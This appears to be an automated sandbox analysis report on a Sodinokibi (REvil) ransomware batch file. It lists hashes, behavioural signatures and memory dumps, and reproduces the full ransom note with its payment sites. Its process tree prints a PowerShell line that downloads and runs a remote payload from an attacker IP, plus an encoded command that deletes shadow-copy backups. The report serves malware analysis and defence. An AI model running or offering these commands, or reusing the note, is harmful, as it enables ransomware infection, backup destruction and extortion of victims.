Analysis

  • max time kernel
    88s
  • max time network
    100s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    18-08-2020 22:10

General

  • Target

    257963fd8d55fc6eb395408d6cd8eb10.bat

  • Size

    216B

  • MD5

    db422fe5e7b4c0a610a166c2521c5b0b

  • SHA1

    4df900c107ef17b5d139be2fb8792908a137c1e2

  • SHA256

    2b9bf7f85b20bc24437ed489cc2b0c2d4ccf0b13baa34e27568ae61d1f67a31f

  • SHA512

    c19beefe11cd9b28d379f33f04061f1a75f52b017cc835997470344c27bb0274a1f555d4f89180183a5168113cd984a682e5db5e1afb5d6fd0eab3e511388f5b

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/257963fd8d55fc6eb395408d6cd8eb10

Extracted

Path

C:\16t307lqae-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 16t307lqae. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FD18DF36649D5926 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/FD18DF36649D5926 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: DB6EE12rFbJpwSsVVEc+8xyuV9zzIjZyQOpa+FoJ/fU//jb1av67E5KYJSIKgjoS R1YisJh1xfJOkfoeel7o01OE9Q6IC0i7ouui8D1xIcbaKLEJqxKs65ugSY1q4TZS Ew7aFGaABw6lAe+BWl8wOMgEx1e86fm76e8WRPviDZ+8rwlvhqkgoS57TRgUGvZT nRTjxO0UiwBcx3F0hP2mN9uzyvsG3W+xnc+TSJN3rSuiz5reKJ3aOcr56zc1Feq9 csyKglQkRx76LJmtZkfoC/G1nn+ZcznGRQw1LACu8gozEFQT1wcXDs5DASJrdUr0 L2SG4GpO7nd3ZaZ0ALDdBsD0OFnvi3ZJxUHC/ZxVDsZcfMFsTMpLImmxRT44LNHj cHWESh2mqzmJlmC3dtWNhZQ8O1Ll9ylVBntCZ0wo50pLaDVRndQm+BEpqIWV8tBu 0JABIub+T8oYInnPAsTaVhTtAwC++DdmMsMztn8mZegF+U4GRXkYtrxKagvX0qan EtpA9OKDS+Fr7SVkIiRFsR3phBTLDROG3Wq6mAqGpM2X/ti8Zogdv8hrGgxcSKDD t4nZy+XXUG3FyWdb5F9r7d5fVMU/TLhPYmuDzhF+OrephLdae9mZMd3Gc0HAhWCQ uQom889i8Ii9MLm98c7UpGr/KR5kwA2zHBT+4O5/bcjNKS5AcgakWmjccvEwUv3g IadkxoL6/TpWnf8bMF+rp2fc3vbzEDaSW4TKIBX/tZHs26U4QIveHp63kkZj2i3l XZuKrpk2aQqYa1hRZi339/z6NTItDN8HIgJTWH2EGEWQWK5257ix2o516Lj2E12B ovxAMqOYnaI8bqzicuUR6LPbW9hFW+VNdS+fHIy4ycA1tlc81yCiR0ZQDcmAU27v WFvevrqrQoetG8a3LK07qjceEhGI2ZE5Ydi+upr2Z0H0xX1bFrK/L9E7RkE65NDG vGYw3YUuJWPeH9Wm8b6NuTqOriBDQxqXOjER86yo7YnhCUXM/w/SYg4mWCU9KXuy kpfRq3PrxM1UZIHrQNVGvHeGwHh6pYNw64XjE/85TORKTlWAdY8aI0bmkoNk7+hp Pzu8eekl/wZioEfr2Znqg5vf0Szg2JfXozPmc4S5cwYR3Uv3I1IVYd7+z2tkKeeI yGdy0UOXfQJGGLoCnDMGAQcePOLsBAJ6Zt11dTLdkPzKtXzL7udEdviAxxrIptyH q9CQQWaP/bTuWG8KvKhMzKs3JXl0BSIqgQhYp7QYJvVPZIC8xWxfI8SuxCvG7Ac0 KEcbNWwiFxTvo+SSyOgro0sHby+JVq1F ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FD18DF36649D5926

http://decryptor.cc/FD18DF36649D5926

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Blacklisted process makes network request 1 IoCs
  • Modifies extensions of user files 15 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 33 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\257963fd8d55fc6eb395408d6cd8eb10.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4048
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/257963fd8d55fc6eb395408d6cd8eb10');Invoke-CXEMWXSCI;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Modifies extensions of user files
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3520
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:968
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1284

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/968-13-0x0000000000000000-mapping.dmp

  • memory/968-27-0x0000000009AA0000-0x0000000009AA1000-memory.dmp

    Filesize

    4KB

  • memory/968-26-0x00000000091E0000-0x00000000091E1000-memory.dmp

    Filesize

    4KB

  • memory/968-24-0x0000000009260000-0x0000000009261000-memory.dmp

    Filesize

    4KB

  • memory/968-14-0x0000000073310000-0x00000000739FE000-memory.dmp

    Filesize

    6.9MB

  • memory/3520-8-0x0000000007BF0000-0x0000000007BF1000-memory.dmp

    Filesize

    4KB

  • memory/3520-6-0x0000000008340000-0x0000000008341000-memory.dmp

    Filesize

    4KB

  • memory/3520-7-0x00000000083B0000-0x00000000083B1000-memory.dmp

    Filesize

    4KB

  • memory/3520-0-0x0000000000000000-mapping.dmp

  • memory/3520-9-0x0000000008B30000-0x0000000008B31000-memory.dmp

    Filesize

    4KB

  • memory/3520-10-0x0000000008B80000-0x0000000008B81000-memory.dmp

    Filesize

    4KB

  • memory/3520-11-0x000000000A280000-0x000000000A281000-memory.dmp

    Filesize

    4KB

  • memory/3520-12-0x0000000009800000-0x0000000009801000-memory.dmp

    Filesize

    4KB

  • memory/3520-5-0x0000000007AD0000-0x0000000007AD1000-memory.dmp

    Filesize

    4KB

  • memory/3520-4-0x0000000007960000-0x0000000007961000-memory.dmp

    Filesize

    4KB

  • memory/3520-3-0x0000000007C10000-0x0000000007C11000-memory.dmp

    Filesize

    4KB

  • memory/3520-2-0x0000000004FE0000-0x0000000004FE1000-memory.dmp

    Filesize

    4KB

  • memory/3520-1-0x0000000073310000-0x00000000739FE000-memory.dmp

    Filesize

    6.9MB